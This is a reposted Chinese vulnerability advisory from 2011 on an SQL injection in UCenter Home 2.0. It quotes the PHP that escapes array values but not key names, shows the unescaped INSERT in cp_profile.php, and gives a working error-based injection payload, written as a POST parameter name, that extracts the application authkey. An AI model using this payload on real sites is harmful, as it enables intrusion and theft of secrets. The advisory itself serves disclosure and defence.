热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

UCenter Home 2.0 鸡叻 SQL 注入

发布时间:2011-01-23 10:20文章来源:T00LS文章作者:alibaba 点击次数:
摘要:发布日期:2011-01.23 发布作者:alibaba 影响版本:UCenter Home 2.0 官方网站:http://www.discuz.net 漏洞类型:SQL注入 漏洞描述:uc_home 2.0 在magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名导致注入产生。 代码分析: function_comm...

发布日期:2011-01.23
发布作者:alibaba


影响版本:UCenter Home 2.0
官方网站:http://www.discuz.net

漏洞类型:SQL注入
漏洞描述:uc_home 2.0 在magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名导致注入产生。
 

代码分析:

  1. function_common.php  
  2.  
  3.  //SQL ADDSLASHES   
  4.  
  5.  function saddslashes($string) {   
  6.  
  7.  if(is_array($string)) {   
  8.  
  9.  foreach($string as $key => $val) {   
  10.  
  11.  $string[$key] = saddslashes($val); //只过滤参数值   
  12.  
  13.  }   
  14.  
  15.  } else {   
  16.  
  17.  $string = addslashes($string);   
  18.  
  19.  }   
  20.  
  21.  return $string;   
  22.  
  23.  }   
  24.  


cp_profile.php 大约56行

  1. //隐私   
  2.  
  3. $inserts = array();   
  4.  
  5. foreach ($_POST['friend'] as $key => $value) {   
  6.  
  7. value = intval($value);   
  8.  
  9. $inserts[] = "('base','$key','$space[uid]','$value')"; //$key 未没过滤   
  10.  
  11. }   
  12.  
  13. if($inserts) {   
  14.  
  15. $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");   
  16.  
  17. $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend)   
  18.  
  19. VALUES ".implode(',', $inserts)); //这里出现注入漏洞   
  20.  
  21. }   


Exploit:


要求: magic_quote_gpc off
URL: cp.php?ac=profile&op=base

保存时创建一个POST,参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]
参数值: 随意

这里我使用火狐的tamper实时添加POST
 

UChome漏洞1
 
得到 uchome的 authkey
 
UChome漏洞2
 

 

标签分类:

上一篇:phpcms V9 BLind SQL 注入漏洞0day
下一篇:没有了